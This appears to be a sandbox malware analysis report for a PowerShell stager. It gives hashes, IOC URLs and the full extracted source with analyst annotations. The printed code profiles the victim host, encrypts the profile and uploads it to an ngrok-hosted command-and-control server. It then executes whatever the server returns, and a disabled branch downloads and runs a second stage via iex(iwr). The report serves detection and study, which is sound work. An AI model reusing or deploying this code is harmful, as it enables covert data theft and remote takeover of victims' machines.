Static task
static1
Behavioral task
behavioral1
Sample
eed116982d3c262a6d5b114d23ba0f70NN.ps1
Resource
win7-20240708-en
windows7-x64
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
eed116982d3c262a6d5b114d23ba0f70NN.ps1
Resource
win10v2004-20240802-en
windows10-2004-x64
4 signatures
150 seconds
General
-
Target
eed116982d3c262a6d5b114d23ba0f70NN
-
Size
4KB
-
MD5
eed116982d3c262a6d5b114d23ba0f70
-
SHA1
76165456d1d03b4eb69af945e385ff91e7778f06
-
SHA256
efabfa6e80a7e6052a8f0b9badf690a680ec247d5eae43eaefa228a503d4c2d7
-
SHA512
92e84db78cd9bb634726c6f6edb170adb315f8f732185a6cafe061802283b6d9a8ae2f649e803a6f27e643cd8cebf9abcc1129ab26bcdac821b40a170c358048
-
SSDEEP
96:UzCILwBo/8badHgwlLRm6nzSmaUE8BhMD7wHFn3:UzCILwBo/V59LRbzSBrPwR3
Score
10/10
Malware Config
Extracted
Language
ps1
Source
1
# Stager configuration (analysis annotation).
# $serverLocation is the command-and-control base URL read by Generate-KeyAndIV
# (GetKey) and by the SubmitInfo upload at the bottom of the script; the host is
# the primary network indicator for this sample.
$serverLocation = "https://mainstream.ngrok.app"
2
# Silences non-terminating errors and progress output so failures leave no
# console trace. NOTE(review): under SilentlyContinue many cmdlet errors never
# become terminating, so several try/catch blocks below may not fire at all.
$ErrorActionPreference = 'SilentlyContinue'
3
$ProgressPreference = 'SilentlyContinue'
4
# Anti-VM gate; hard-coded off in this build, so VMPROTECT is never invoked.
$vm_protect = $false
5
6
if ($vm_protect) {
7
# VMPROTECT is defined further down the file. In a script the function
# statement has not executed yet at this point, so flipping the flag alone
# would not find the command here; the definition would have to move up.
VMPROTECT
8
}
9
10
# VMPROTECT: download-and-execute of a second-stage "anti-VM" script.
# Fetches the body at the hard-coded URL with Invoke-WebRequest (iwr) and runs
# it in-process with Invoke-Expression (iex); nothing is written to disk.
# Detection points: iwr output fed directly to iex, and the ratte.ngrok.app host.
# Only reachable when $vm_protect is $true, which this sample does not set.
function VMPROTECT {
11
$link = "https://ratte.ngrok.app/Main/antivm.ps1"
12
# -useb (UseBasicParsing) skips the IE-based HTML parser so this works headless.
iex (iwr -uri $link -useb)
13
# Reached only if the downloaded script returns control to this function.
Write-Host "[!] NOT A VIRTUALIZED ENVIRONMENT" -ForegroundColor Green
14
}
15
16
# Generate-KeyAndIV: requests a per-session AES key and IV from the C2.
# Arguments: $apiKey - sent verbatim in the "Api-Key" request header.
# Returns:   @(SessionId, key bytes, iv bytes) taken from the JSON response
#            fields SessionId, Key and IV (Key/IV are base64-decoded).
# Reads script-scope $serverLocation. Network indicator:
#   GET <serverLocation>/?method=GetKey with an Api-Key header.
# On a terminating error the catch prints the error and exits the whole script.
function Generate-KeyAndIV {
17
param (
18
[string]$apiKey
19
)
20
try {
21
$headers = @{
22
"Api-Key" = $apiKey
23
}
24
$response = Invoke-RestMethod -Uri "$serverLocation/?method=GetKey" -Headers $headers
25
$sessionId = $response.SessionId
26
# NOTE(review): if the request failed non-terminatingly, $response is empty
# and FromBase64String receives $null here rather than landing in the catch.
$key = [System.Convert]::FromBase64String($response.Key)
27
$iv = [System.Convert]::FromBase64String($response.IV)
28
return @($sessionId, $key, $iv)
29
} catch {
30
Write-Host "[!] Error generating key and IV: $_"
31
exit
32
}
33
}
34
35
# Encrypt-Data: AES-CBC/PKCS7 encryption of a string, base64-encoded result.
# Arguments: $key, $iv - raw AES key and IV bytes (here, the ones the C2 handed
#            out); $data - plaintext string, UTF-8 encoded before encryption.
# Returns:   base64 ciphertext; on a terminating error prints and exits the script.
# Analysis note: the key and IV originate from the server's GetKey response, so
# this provides no confidentiality against anyone who holds that response.
# The Aes object is never disposed; harmless for a one-shot script.
function Encrypt-Data {
36
param (
37
[byte[]]$key,
38
[byte[]]$iv,
39
[string]$data
40
)
41
try {
42
$aes = [System.Security.Cryptography.Aes]::Create()
43
$aes.Key = $key
44
$aes.IV = $iv
45
$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
46
$aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
47
48
$encryptor = $aes.CreateEncryptor()
49
$dataBytes = [System.Text.Encoding]::UTF8.GetBytes($data)
50
# Single-shot transform: whole buffer in, padded ciphertext out.
$encryptedBytes = $encryptor.TransformFinalBlock($dataBytes, 0, $dataBytes.Length)
51
52
return [System.Convert]::ToBase64String($encryptedBytes)
53
} catch {
54
Write-Host "[!] Error encrypting data: $_"
55
exit
56
}
57
}
58
59
# Get-ExternalIP: returns the public IP string reported by ifconfig.me (over
# plain HTTP), trimmed; "N/A" if the call throws.
# Host/network indicator: powershell.exe contacting ifconfig.me.
function Get-ExternalIP {
60
try {
61
$externalIP = (Invoke-RestMethod -Uri "http://ifconfig.me").Trim()
62
return $externalIP
63
} catch {
64
Write-Host "[!] Error getting external IP: $_"
65
return "N/A"
66
}
67
}
68
69
# Get-UserName: returns $env:USERNAME. The try/catch is effectively dead code —
# reading an environment variable does not throw — but mirrors the other getters.
function Get-UserName {
70
try {
71
return $env:USERNAME
72
} catch {
73
Write-Host "[!] Error getting user name: $_"
74
return "N/A"
75
}
76
}
77
78
# Get-PCName: returns $env:COMPUTERNAME. Same redundant try/catch shape as
# Get-UserName; an env-var read does not throw.
function Get-PCName {
79
try {
80
return $env:COMPUTERNAME
81
} catch {
82
Write-Host "[!] Error getting PC name: $_"
83
return "N/A"
84
}
85
}
86
87
# Get-Location: geolocates the host via ip-api.com (plain HTTP) and returns the
# parsed JSON object; the caller reads its .country and .city members.
# Returns an empty hashtable on a terminating error.
# NOTE(review): this name shadows the built-in Get-Location cmdlet (alias pwd)
# for the rest of the session — a side effect worth knowing when analysing
# transcripts, since later "Get-Location" calls would hit this function.
# Network indicator: request to ip-api.com/json.
function Get-Location {
88
try {
89
$locationData = Invoke-RestMethod -Uri "http://ip-api.com/json"
90
return $locationData
91
} catch {
92
Write-Host "[!] Error getting location: $_"
93
return @{}
94
}
95
}
96
97
# Get-OSVersion: returns the Win32_OperatingSystem Caption (friendly OS name)
# via CIM/WMI, or "N/A" on error. A WMI query from powershell.exe is a common
# telemetry hook for this kind of host profiling.
function Get-OSVersion {
98
try {
99
return (Get-CimInstance -ClassName Win32_OperatingSystem).Caption
100
} catch {
101
Write-Host "[!] Error getting OS version: $_"
102
return "N/A"
103
}
104
}
105
106
# Get-DomainName: returns the AD domain name the machine is joined to, or "N/A".
# Uses System.DirectoryServices.ActiveDirectory; on a workgroup machine the
# GetComputerDomain() call is expected to throw, which the catch maps to "N/A",
# so the $null branch is mostly a belt-and-braces path.
# Style: `$domain -ne $null` is the form PSScriptAnalyzer flags; `$null -ne $domain`
# avoids array-comparison surprises (not changed here, comment only).
function Get-DomainName {
107
try {
108
$domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetComputerDomain()
109
if ($domain -ne $null) {
110
return $domain.Name
111
} else {
112
return "N/A"
113
}
114
} catch {
115
Write-Host "[!] Error getting domain name: $_"
116
return "N/A"
117
}
118
}
119
120
# Get-BuildType: constant build tag reported to the C2 in the "BuildType" field.
# The trailing "# BUILD" marker suggests it is templated per build; the value is
# a cheap way to cluster samples from the same generator.
function Get-BuildType {
121
return "Main" # BUILD
122
}
123
124
# Get-IsAdmin: $true when the current token is in the local Administrators role
# (WindowsPrincipal.IsInRole), $false on error. Note this reflects the active
# (possibly UAC-filtered) token, not group membership in general.
function Get-IsAdmin {
125
try {
126
$principal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())
127
return $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
128
} catch {
129
Write-Host "[!] Error checking admin status: $_"
130
return $false
131
}
132
}
133
134
# Main flow: key exchange -> host profiling -> encrypt -> upload -> execute reply.
# Static API key sent as the Api-Key header on both C2 requests; as a fixed
# string it is a usable network signature for this build.
$apiKey = "4BXeTjJEq8n40"
135
$keyAndIV = Generate-KeyAndIV -apiKey $apiKey
136
$sessionId = $keyAndIV[0]
137
$key = $keyAndIV[1]
138
$iv = $keyAndIV[2]
139
140
# Host profiling. Each call is a separate observable: two plain-HTTP lookups
# (ifconfig.me, ip-api.com), one WMI query, one AD call, one token check.
$externalIP = Get-ExternalIP
141
$userName = Get-UserName
142
$pcName = Get-PCName
143
$location = Get-Location
144
$country = $location.country
145
$city = $location.city
146
$osVersion = Get-OSVersion
147
# Despite the name, $isDomain holds the domain name string (or "N/A"), not a bool.
$isDomain = Get-DomainName
148
$buildType = Get-BuildType
149
$isAdmin = Get-IsAdmin
150
151
# Beacon payload. These nine keys are the schema the C2 expects.
$data = @{
152
"ExternalIP" = $externalIP
153
"UserName" = $userName
154
"PCName" = $pcName
155
"Country" = $country
156
"City" = $city
157
"OSVersion" = $osVersion
158
"IsDomain" = $isDomain
159
"BuildType" = $buildType
160
"IsAdmin" = $isAdmin
161
}
162
163
$jsonData = $data | ConvertTo-Json
# The plaintext profile is echoed to the console, so a PowerShell transcript
# or script-block log captures exactly what was exfiltrated.
Write-Host "[!] JSON data: $jsonData"
165
166
$encryptedData = Encrypt-Data -key $key -iv $iv -data $jsonData
167
Write-Host "[!] Encrypted data: $encryptedData"
168
169
# Upload via WebClient (a different HTTP stack than Invoke-RestMethod above,
# so user-agent and TLS fingerprints may differ between the two requests).
$url = "$serverLocation/?method=SubmitInfo"
170
$webClient = New-Object System.Net.WebClient
171
$webClient.Headers.Add("Api-Key", $apiKey)
172
$webClient.Headers.Add("Content-Type", "application/json")
173
174
try {
175
# Body format: "<SessionId>\n<base64 ciphertext>" (Content-Type says JSON, but
# the body is not JSON — another protocol quirk a detection could key on).
$requestBody = $sessionId + "`n" + $encryptedData
176
$response = $webClient.UploadString($url, $requestBody)
177
Write-Host "[!] Server response: $response"
178
# Core capability: whatever text the server returns is executed as PowerShell
# in this process. Treat any SubmitInfo response as a delivered payload.
Invoke-Expression -Command $response
179
} catch {
180
# Errors are printed only; the script ends quietly either way.
Write-Host "[!] Error sending data: $_"
181
}
182
URLs
exe.dropper
https://mainstream.ngrok.app
exe.dropper
https://ratte.ngrok.app/Main/antivm.ps1
Signatures
Files
-
eed116982d3c262a6d5b114d23ba0f70NN.ps1